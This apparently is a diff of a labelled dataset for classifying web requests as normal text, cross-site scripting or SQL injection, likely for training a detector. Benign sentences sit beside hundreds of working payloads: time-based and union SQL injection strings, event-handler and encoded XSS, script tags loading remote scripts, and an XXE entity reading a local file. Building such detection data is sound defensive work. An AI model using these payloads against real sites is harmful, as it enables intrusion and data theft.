contenteditable>drop here</em>",1,XSS,4490 -"<param draggable=""true"" ondrag=""alert(1)"">test</param>",1,XSS,5002 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*",2,SQLi,10996 -<embed onpointerdown=alert(1)>XSS</embed>,1,XSS,4116 -"<div draggable=""true"" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp>",1,XSS,1944 -"&#00;</form><input type&#61;""date"" onfocus=""alert(1)"">",1,XSS,813 -select sleep ( 5 ) ) +',2,SQLi,15985 -"<slot onmouseout=""alert(1)"">test</slot>",1,XSS,3003 -"<style>:target {color:red;}</style><meter id=x style=""transition:color 1s"" ontransitionend=alert(1)></meter>",1,XSS,3799 -<dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus>,1,XSS,6913 +Select your glimpse.,0,normal,24950 +"&lt;LINK REL=\""stylesheet\"" HREF=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,938 +"1"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,19189 +<blink onpointerdown=alert(1)>XSS</blink>,1,XSS,5864 +"<noframes draggable=""true"" ondragenter=""alert(1)"">test</noframes>",1,XSS,7626 +"1%"" ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,19951 +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>,1,XSS,675 +select pg_sleep ( 5 ) --,2,SQLi,19789 +I need to select the appropriate ingredients for the recipe.,0,normal,23928 +"1 ) where 9059 = 9059 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,18770 +"Select the ""More"" button next to the video you want to download, and then select ""Download.""",0,normal,25566 +1 ) where 6950 = 6950 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,16850 +"1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'rgue' like 'rgue",2,SQLi,15164 +"1'|| ( select 'xbwg' where 7518 = 7518 union all select null,null,null,null,null,null--",2,SQLi,19211 +"1' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 'kmjn' = 'kmjn",2,SQLi,22089 +"1%"" ) ) union all select null,null#",2,SQLi,14922 +"<rt draggable=""true"" ondragstart=""alert(1)"">test</rt>",1,XSS,4307 +<title onpointerleave=alert(1)>XSS</title>,1,XSS,5428 +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>,1,XSS,678 +"<address onmouseleave=""alert(1)"">test</address>",1,XSS,6699 +from,0,normal,26476 +Where's your SQL data?,0,normal,23381 +"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,19912 +"-4091 ) ) as lqqy where 3030 = 3030 union all select 3030,3030,3030#",2,SQLi,13571 +"-8833' ) ) union all select 3227,3227,3227,3227,3227--",2,SQLi,16077 +"1%"" order by 1#",2,SQLi,17589 +Sort the jumbled cables.,0,normal,22578 +"1%' ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( '%' = '",2,SQLi,19377 +"1' where 7080 = 7080 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,16706 +select ( case when ( 1726 = 4080 ) then 1726 else 1/ ( select 0 ) end ) --,2,SQLi,21993 +"<style>:target {color:red;}</style><img id=x style=""transition:color 1s"" ontransitionend=alert(1)></img>",1,XSS,8311 +"iif ( 2084 = 5671,1,1/0 )",2,SQLi,16037 +"1' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'bdsq' like 'bdsq",2,SQLi,21445 +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>,1,XSS,737 +AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP),2,SQLi,10722 +Select a scent for the room.,0,normal,23988 +"1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'qyyg' = 'qyyg",2,SQLi,16829 +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus>,1,XSS,6713 +"1%' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( '%' = '",2,SQLi,19683 +"select * from users where id = 1 union select +!<1,version ( ) -- 1",2,SQLi,11502 +<summary onpointerover=alert(1)>XSS</summary>,1,XSS,3114 +ORDER BY 28--,2,SQLi,10164 +Select a class to take for self-improvement.,0,normal,23962 +"or 0=0 – +%' or '0'='0 +or 1=1 +or 1=1-- +or 1=1/* +or 1=1# +or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +or ""1""=""1",2,SQLi,9923 +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;,1,XSS,1053 +"<thead onpaste=""alert(1)"" contenteditable>test</thead>",1,XSS,7474 +"-1263"" ) or 9323 = 9323#",2,SQLi,13470 +"<A/hREf=""j%0aavas%09cript%0a:%09con%0afirm%0d``"">z",1,XSS,9531 +"1"" where 5440 = 5440 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,14145 +"1"" union all select null,null,null,null#",2,SQLi,14738 +Join the yoga class.,0,normal,22683 +<slot onpointerdown=alert(1)>XSS</slot>,1,XSS,5567 +"1"" ) and sleep ( 5 ) #",2,SQLi,19132 +"><script+src=http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()""></script>",1,XSS,9749 +"<ruby onkeypress=""alert(1)"" contenteditable>test</ruby>",1,XSS,7699 +"<header onkeyup=""alert(1)"" contenteditable>test</header>",1,XSS,6057 +1 ) as vbli where 5139 = 5139 and 2782 = 2625--,2,SQLi,12891 +"SRC=""http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode",1,XSS,8317 +"<style>:target {color:red;}</style><figure id=x style=""transition:color 1s"" ontransitionend=alert(1)></figure>",1,XSS,2733 +"<param draggable=""true"" ondragenter=""alert(1)"">test</param>",1,XSS,3549 +1' ) as uwmy where 6980 = 6980,2,SQLi,15977 +"<h1 draggable=""true"" ondragenter=""alert(1)"">test</h1>",1,XSS,8630 +"1 ) ) as krzi where 8727 = 8727 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,19913 +"<menuitem draggable=""true"" ondragleave=""alert(1)"">test</menuitem>",1,XSS,7840 +-1629' ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'tezf' = 'tezf,2,SQLi,22269 +Where did you find that cozy cafe?,0,normal,23745 +"<abbr ondblclick=""alert(1)"">test</abbr>",1,XSS,8883 +1' ) as ghvi where 3880 = 3880 and 4595 = 4595#,2,SQLi,20744 +1' where 2913 = 2913 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,15558 +"1'|| ( select 'hrpa' where 1973 = 1973 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15163 +"1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 'qdhz' = 'qdhz",2,SQLi,21046 +"1"" where 4672 = 4672",2,SQLi,16320 +1' ) where 2120 = 2120,2,SQLi,16142 +"<audio controls autoplay onratechange=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,95 +<dir onpointermove=alert(1)>XSS</dir>,1,XSS,2209 +waitfor delay '0:0:5' and '%' = ',2,SQLi,20203 +"1' ) ) as nuku where 7009 = 7009 union all select null,null,null,null,null#",2,SQLi,17317 +<nobr onpointerdown=alert(1)>XSS</nobr>,1,XSS,2184 +"-5014"" ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""dkyp"" like ""dkyp",2,SQLi,13790 +"1' ) as knxr where 5662 = 5662 union all select null,null,null,null,null,null,null,null#",2,SQLi,12370 +"1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""xyjg"" = ""xyjg",2,SQLi,17471 +"1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'zpzf' = 'zpzf",2,SQLi,12742 +<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus>,1,XSS,3917 +"<div draggable=""true"" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem>",1,XSS,6096 +select 'qqpjq'|| ( select ( case when ( 2933 = 2933 ) then 1 else 0 end ) ) ||'qzvzq',2,SQLi,17117 +"-7531' ) union all select 3072,3072,3072,3072,3072,3072,3072--",2,SQLi,12540 +"<nobr onmousemove=""alert(1)"">test</nobr>",1,XSS,4853 +Robert Maxwell (1695-1765) was the author of Select Transactions of the Society of Improvers and was a great benefactor to Scottish agriculture.,0,normal,25703 +<object id=x onfocus=alert(1) type=text/html>,1,XSS,2488 +"-3361 where 1335 = 1335 or elt ( 5891 = 5092,5092 ) --",2,SQLi,15411 +"1' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'xonc' = 'xonc",2,SQLi,17866 +if ( 1087 = 5839 ) select 1087 else drop function zzeh--,2,SQLi,13511 +"1' ) as nmzp where 3794 = 3794 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,20468 +"1%"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""%"" = """,2,SQLi,22267 +Select a color scheme for the website.,0,normal,24117 +"1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,18067 +"<IMG SRC="" &#14; javascript:alert('');"">",1,XSS,5672 +)%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,10753 +"1' ) where 8211 = 8211 union all select null,null,null,null,null#",2,SQLi,12628 +Select your submission.,0,normal,24910 +<rp onpointerenter=alert(1)>XSS</rp>,1,XSS,7585 +"-3913"" where 6085 = 6085 union all select 6085,6085,6085,6085,6085,6085,6085#",2,SQLi,20414 +"1%"" ) ) and sleep ( 5 ) #",2,SQLi,17432 +"data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=",1,XSS,1283 +"<article onclick=""alert(1)"">test</article>",1,XSS,2617 +1' rlike sleep ( 5 ) and 'cugs' = 'cugs,2,SQLi,13472 +"-6431"" ) ) union all select 2358,2358,2358,2358,2358,2358,2358,2358,2358,2358#",2,SQLi,19454 +"1' ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13767 +1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- izad,2,SQLi,14648 +1' where 1623 = 1623,2,SQLi,13192 +"<template onbeforecut=""alert(1)"" contenteditable>test</template>",1,XSS,2387 +"<nextid onbeforecut=""alert(1)"" contenteditable>test</nextid>",1,XSS,2174 +"<div id=""116""><div id=""x"">x</div>",1,XSS,9051 +"<progress oncopy=""alert(1)"" contenteditable>test</progress>",1,XSS,5457 +"<LINK REL=""stylesheet"" HREF=""javascript:javascript:alert(1);"">",1,XSS,708 +"1' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,15169 +<script>location.protocol='javascript'</script>,1,XSS,168 +"<section onbeforepaste=""alert(1)"" contenteditable>test</section>",1,XSS,3626 +To save a spreadsheet select File Save or click the Save icon on the Standard toolbar.,0,normal,25225 +1 ) where 4479 = 4479 rlike ( select ( case when ( 6351 = 4367 ) then 1 else 0x28 end ) ) --,2,SQLi,14549 +"<ul onkeypress=""alert(1)"" contenteditable>test</ul>",1,XSS,3625 +Go and select.,0,normal,24754 +"<legend onmousedown=""alert(1)"">test</legend>",1,XSS,3711 +"<button onbeforecut=""alert(1)"" contenteditable>test</button>",1,XSS,5886 +-9622' ) ) ) order by 1#,2,SQLi,13794 +Select your signal.,0,normal,24865 +"1%' ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,21900 +1 ) ) ) and ( 6148 = 3343 ) *3343 and ( ( ( 3271 = 3271,2,SQLi,18727 +select * from users where id = 1 + ( \+ ) or 1 = 1 -- 1,2,SQLi,11627 +"<form onmousemove=""alert(1)"">test</form>",1,XSS,2637 +Where's your SQL knowledge?,0,normal,23344 +<bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus>,1,XSS,4352 +"<BODY ONLOAD=alert(""XSS"")>",1,XSS,1303 +1'+ ( select ukwc where 3008 = 3008 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16133 +<object onpointerenter=alert(1)>XSS</object>,1,XSS,5517 +1 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,16382 +VITAMIN E RAISES PROSTATE CANCER RISK: THE select TRIAL The select trial (the Selenium and Vitamin E Cancer Prevention Trial) was designed to determine the long range effect of selenium and vitamin E supplements on prostate cancer.,0,normal,25149 +youtube. com / watch? v = rBrx9D … - New GTA Line 5 Top Content - if you felt like discovering any new business tactics and strategies! Click for the Link and Select Like the Video! Much I Love More and Thank You my guys! Book 100,0,normal,25019 +AS INJECTX WHERE 1=1 AND 1=0,2,SQLi,10126 +"1%"" ) union all select null,null,null,null,null--",2,SQLi,16854 +"-1272' or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,17987 +"<style>:target {transform: rotate(180deg);}</style><title id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></title>",1,XSS,5866 +<button onOffline=javascript:alert(1)>,1,XSS,9607 +<dfn id=x tabindex=1 onactivate=alert(1)></dfn>,1,XSS,3265 +"<div draggable=""true"" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong>",1,XSS,5679 +Who Should select Senators?,0,normal,25093 +"-4543"" ) or 3038 = 3038",2,SQLi,15960 +"1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( 'gydh' = 'gydh",2,SQLi,16606 +"select * from users where id = 1 <@$$ union select 1,version ( ) -- 1",2,SQLi,11407 +"1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) )",2,SQLi,21436 +1' and sleep ( 5 ),2,SQLi,14327 +"<div draggable=""true"" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark>",1,XSS,2100 +"UNION SELECT @@VERSION,SLEEP(5),3",2,SQLi,10484 +"-9873"" union all select 8020,8020,8020,8020,8020,8020#",2,SQLi,15920 +"<style>@keyframes x{}</style><textarea style=""animation-name:x"" onanimationstart=""alert(1)""></textarea>",1,XSS,6416 +1' in boolean mode ) and sleep ( 5 ) #,2,SQLi,14519 +1 and sleep ( 5 ) #,2,SQLi,21139 +"<SCRIPT SRC=""http://xss.rocks/xss.jpg""></SCRIPT>",1,XSS,286 +"-2059%"" or elt ( 4587 = 3101,3101 ) and ""%"" = """,2,SQLi,14758 +1' ) ) and 7533 = 7533 and ( ( 'pagc' like 'pagc,2,SQLi,18219 +and SELECT pg_sleep(5);,2,SQLi,11252 +1%' and 7366 = 9197#,2,SQLi,20137 +"<picture draggable=""true"" ondragstart=""alert(1)"">test</picture>",1,XSS,8399 +"1 where 7196 = 7196 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,14659 +"<body onMouseOver body onMouseOver=""javascript:javascript:alert(1)""></body onMouseOver>",1,XSS,361 +"<embed type=""image"" src=%(scriptlet)s></embed>",1,XSS,745 +"1 ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 5621 = 5621",2,SQLi,16446 +<form onpointerover=alert(1)>XSS</form>,1,XSS,5534 +"1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,21367 +"1' ) where 6774 = 6774 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,21061 +"<span draggable=""true"" ondragend=""alert(1)"">test</span>",1,XSS,1835 +"1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'sjxp' like 'sjxp",2,SQLi,22142 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) # idxq",2,SQLi,21088 +"<listing onmouseleave=""alert(1)"">test</listing>",1,XSS,3499 +"-5193 where 2175 = 2175 union all select 2175,2175,2175,2175,2175,2175,2175,2175,2175,2175#",2,SQLi,21381 +1' ) as gogu where 4338 = 4338 union all select null#,2,SQLi,15470 +"<style>:target {color: red;}</style><kbd id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></kbd>",1,XSS,2967 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--",2,SQLi,10580 +UNION ALL SELECT 'INJ'||'ECT'||'XXX'--,2,SQLi,10665 +Select your watch.,0,normal,24949 +<ul onpointerleave=alert(1)>XSS</ul>,1,XSS,2783 +"1"" where 2221 = 2221 and 5318 = 8398--",2,SQLi,16341 +if ( 1928 = 4811 ) select 1928 else drop function ucko--,2,SQLi,14803 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( 'wusq' = 'wusq",2,SQLi,13759 +"<body onResize body onResize=""javascript:javascript:alert(1)""></body onResize>",1,XSS,386 +Plant a fruit tree.,0,normal,22723 +<hr onpointerenter=alert(1)>XSS</hr>,1,XSS,7278 +<script>javascript:alert(1)</script\x0B,1,XSS,400 +"<th oncontextmenu=""alert(1)"">test</th>",1,XSS,3480 +"-9988%"" or elt ( 1032 = 1032,3623 ) and ""%"" = """,2,SQLi,16234 +"<meta charset=""UTF-7"" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-",1,XSS,177 +1' ) as mpsf where 3348 = 3348,2,SQLi,13329 +Where's the university?,0,normal,23478 +</br style=a:expression(alert())>,1,XSS,1262 +"1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and 'rupq' = 'rupq",2,SQLi,19267 +"<img/id=""alert&lpar;&#x27;XSS&#x27;&#x29;\""/alt=\""/\""src=\""/\""onerror=eval(id&#x29;>",1,XSS,9691 +Fetch records where applicable.,0,normal,23303 +Select your proclaim.,0,normal,24924 +"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337",2,SQLi,11216 +"-9774' ) ) ) union all select 6954,6954,6954#",2,SQLi,15620 +"<thead oncopy=""alert(1)"" contenteditable>test</thead>",1,XSS,3306 +<picture id=x tabindex=1 onfocusin=alert(1)></picture>,1,XSS,6030 +"-2639"" ) where 1494 = 1494 union all select 1494--",2,SQLi,16338 +"1%' ) union all select null,null,null#",2,SQLi,17663 +"<div onmouseover=""document.vulnerable=true;"">",1,XSS,1465 +select ( case when ( 1898 = 4705 ) then 1898 else 1/ ( select 0 ) end ) --,2,SQLi,16189 +"-1171' union all select 3958,3958,3958,3958,3958--",2,SQLi,12957 +"<command onkeypress=""alert(1)"" contenteditable>test</command>",1,XSS,5698 +"<p oncopy=""alert(1)"" contenteditable>test</p>",1,XSS,5032 +"select * from users where id = '1' + @ 1! union select 1,version ( ) -- 1'",2,SQLi,11986 +<del id=x tabindex=1 onfocusin=alert(1)></del>,1,XSS,8640 +<image onpointerout=alert(1)>XSS</image>,1,XSS,4975 +"""></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>",1,XSS,1291 +Where's the data source?,0,normal,23434 +<small onpointerenter=alert(1)>XSS</small>,1,XSS,4886 +"<link draggable=""true"" ondragstart=""alert(1)"">test</link>",1,XSS,6919 +"select * from users where id = 1 or 1#""{ union select version ( ) ,version ( ) -- 1",2,SQLi,11586 +"-4076' ) ) union all select 9030,9030,9030,9030,9030,9030,9030,9030,9030,9030--",2,SQLi,12300 +<form onsubmit=alert(1)><input type=submit>,1,XSS,104 +"1' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'miba' = 'miba",2,SQLi,15119 +I'm thinking of where to go for relaxation.,0,normal,23672 +\u003c,1,XSS,1038 +"-7235"" ) union all select 4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#",2,SQLi,13594 +Select mail.,0,normal,24667 +"<div id=""100""><img[a][b]src=x[d]onerror[c]=[e]""alert(100)"">//[""'`-->]]>]</div><div id=""101""><a href=""[a]java[b]script[c]:alert(101)"">XXX</a>//[""'`-->]]>]</div><div id=""102""><img src=""x` `<script>alert(102)</script>""` `>//[""'`-->]]>]</div><div id=""103""><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//[""'`-->]]>]</div>",1,XSS,9041 +1' ) as zmvn where 2887 = 2887 union all select null--,2,SQLi,19973 +"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:///dev/random"">]><foo>&xee;</foo>",1,XSS,1641 +"<;SCRIPT "";a=';>;';""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,1599 +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>,1,XSS,1066 +"-9382' ) union all select 4774,4774,4774,4774--",2,SQLi,19216 +1 where 9872 = 9872,2,SQLi,12311 +-4082 ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 7874 = 7874,2,SQLi,12333 +Sports book betting odds 4 select your font face.,0,normal,25489 +"<em onbeforepaste=""alert(1)"" contenteditable>test</em>",1,XSS,1848 +"1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 'wesl' = 'wesl",2,SQLi,21024 +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-,1,XSS,1086 +&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;,1,XSS,1372 +"1"" ) as rqpp where 9383 = 9383 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12883 +"select * from users where id = '1' union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,11888 +"1"" waitfor delay '0:0:5' and ""syhx"" = ""syhx",2,SQLi,21503 +Where's the mosque?,0,normal,23496 +"<style></style\x3E<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,425 +"<style>:target {color: red;}</style><wbr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></wbr>",1,XSS,5971 +"1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'lshk' like 'lshk",2,SQLi,15565 +"1"" where 7828 = 7828",2,SQLi,18003 +-8004%' ) or ( 2301 = 7504 ) *7504 and ( '%' = ',2,SQLi,16600 +"<applet onmouseout=""alert(1)"">test</applet>",1,XSS,4788 +"<th onbeforecut=""alert(1)"" contenteditable>test</th>",1,XSS,7362 +"<object draggable=""true"" ondragleave=""alert(1)"">test</object>",1,XSS,7793 +"-1808%"" ) ) or 4595 = 3545 and ( ( ""%"" = """,2,SQLi,12359 +"<font oncopy=""alert(1)"" contenteditable>test</font>",1,XSS,3203 +"1"" ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""vudj"" like ""vudj",2,SQLi,14815 +Insert the USB stick.,0,normal,22731 +"-4121%"" ) union all select 2659,2659,2659,2659,2659,2659,2659,2659--",2,SQLi,19416 +"1' ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'owot' = 'owot",2,SQLi,12921 +"1"" ) ) as brwj where 9180 = 9180",2,SQLi,12702 +Select crops will be grown indoors using hydroponics (without soil).,0,normal,25596 +"1%"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""%"" = """,2,SQLi,18984 +"-4637' union all select 9361,9361,9361,9361,9361,9361,9361,9361#",2,SQLi,18747 +"<body onresize=""print()"">",1,XSS,32 +Select the perfect quote for your post.,0,normal,24086 +"1 ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14403 +"<figcaption onmouseover=""alert(1)"">test</figcaption>",1,XSS,2343 +select ( case when ( 5390 = 7419 ) then 5390 else 5390* ( select 5390 from mysql.db ) end ) #,2,SQLi,12323 +1' in boolean mode ) and 5981 = 6700,2,SQLi,13215 +"<audio controls autoplay ontimeupdate=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,36 +"<slot draggable=""true"" ondragleave=""alert(1)"">test</slot>",1,XSS,5509 +"1' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 'khah' like 'khah",2,SQLi,20102 +"select * from generate_series ( 2382,2382,case when ( 2382 = 4352 ) then 1 else 0 end ) limit 1--",2,SQLi,21013 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></time>",1,XSS,7935 +"<mark onpaste=""alert(1)"" contenteditable>test</mark>",1,XSS,7965 